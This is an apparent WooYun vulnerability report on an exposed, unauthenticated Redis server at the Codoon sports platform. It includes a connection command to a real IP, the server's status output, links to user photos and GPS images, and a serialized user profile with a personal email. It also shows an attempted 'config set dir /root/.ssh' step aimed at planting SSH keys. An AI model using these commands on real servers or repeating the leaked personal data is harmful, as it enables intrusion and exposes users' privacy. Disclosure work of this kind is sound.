当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162440

漏洞标题:咕咚网某平台Redis未授权访问敏感信息泄露

相关厂商:咕咚网

漏洞作者: 路人甲

提交时间:2015-12-19 15:40

修复时间:2016-02-04 17:47

公开时间:2016-02-04 17:47

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-19: 细节已通知厂商并且等待厂商处理中
2015-12-22: 厂商已经确认,细节仅向厂商公开
2016-01-01: 细节向核心白帽子及相关领域专家公开
2016-01-11: 细节向普通白帽子公开
2016-01-21: 细节向实习白帽子公开
2016-02-04: 细节向公众公开

简要描述:

Redis匿名访问,并且对外开放~

详细说明:

# 1 redis 未授权访问
redis-cli -h 211.78.245.48

redis_version:2.4.7
redis_git_sha1:00000000
redis_git_dirty:0
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.6
multiplexing_api:epoll
gcc_version:4.4.6
process_id:1041
uptime_in_seconds:63210637
uptime_in_days:731
lru_clock:338689
used_cpu_sys:84255.39
used_cpu_user:33401.28
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
connected_clients:60
connected_slaves:0
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:16
used_memory:11248256
used_memory_human:10.73M
used_memory_rss:427347968
used_memory_peak:178719528
used_memory_peak_human:170.44M
mem_fragmentation_ratio:37.99
mem_allocator:jemalloc-2.2.5
loading:0
aof_enabled:0
changes_since_last_save:2310025
bgsave_in_progress:0
last_save_time:1448283306
bgrewriteaof_in_progress:0
total_connections_received:5106809
total_commands_processed:500165572
expired_keys:1704644
evicted_keys:0
keyspace_hits:42944402
keyspace_misses:19498151
pubsub_channels:3
pubsub_patterns:0
latest_fork_usec:0
vm_enabled:0
role:master
db0:keys=4,expires=0
db1:keys=3385,expires=2
db3:keys=9,expires=0
db5:keys=2,expires=0
db6:keys=10,expires=0
db9:keys=976,expires=976
db10:keys=69,expires=69
db11:keys=3385,expires=1968
db12:keys=8,expires=0
db13:keys=4,expires=4


# 2 会员信息泄露
网站图片没有做防盗链,所以可以看到妹子

http://img3.codoon.com/portrait/0c4626a3-d0a3-411d-8351-4469a667d05c/2015-10-28T21:50:54
http://img3.codoon.com/portrait/0c4626a3-d0a3-411d-8351-4469a667d05c/2015-10-28T21:50:54
http://img3tw.codoon.com/gps119397e29e21481f8a0582c358a95f92
http://img3tw.codoon.com/gpsa3bed04ac4674c88afe728f161bc6cde
http://img3tw.codoon.com/gpscd3efffd8caa4ef090861e8f27a2f59b
http://img3tw.codoon.com/gpsda6e429df95145369421e2c2ab26eaab


邮箱地址泄露:

ccopy_reg
_reconstructor
p1
(cwww.useraccount.models
UserProfile
p2
c__builtin__
dict
p3
(dp4
S'mobilenumber'
p5
VI1447404059357
p6
sS'domain'
p7
V~vrc9u51
p8
sS'certificatename'
p9
V
sS'last_login'
p10
I0
sS'realname'
p11
V 
sS'emailverified'
p12
I01
sS'tmp_portrait'
p13
V
sS'verify_code'
p14
V6855b4afe9e7428ba24f8643e7ee8401
p15
sS'birthday'
p16
(dp17
S'y'
I2015
sS'm'
I8
sS'd'
I1
ssS'address'
p18
V
sS'portrait'
p19
V 
sS'id'
p20
Vf195193f-4b2a-4b93-bb34-02530644260b
p21
sS'_updated'
p22
cdatetime
datetime
p23
(S'\x07\xdf\x0c\x12\x0e\x15\x18\x03#T'
tRp24
sS'fighting_level'
p25
I0
sS'group_ids'
p26
V
sS'is_newuser'
p27
I01
sS'gender'
p28
V1
sS'followings'
p29
I0
sS'_auto_id'
p30
L8537L
sS'certificateid'
p31
V
sS'nick'
p32
Vsiml
p33
sS'descroption'
p34
V
sS'followers'
p35
I0
sS'location'
p36
V\u5317\u4eac
p37
sS'mobileverified'
p38
I00
sS'hobby'
p39
V\u8dd1\u6b65
p40
sS'mobile_portraits'
p41
(lp42
sS'email'
p43
Vfuture1422@gmail.com
p44
sS'certificateinfo'
p45
V
sS'installed_apps'
p46
VCODOONSPORTS_ANDROID
p47
stRp48

漏洞证明:

config set dir /root/.ssh
(error) ERR Changing directory: Permission denied



gpsda6e429df95145369421e2c2ab26eaab.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-12-22 08:28

厂商回复:

确认漏洞

最新状态:

暂无

漏洞评价:

评价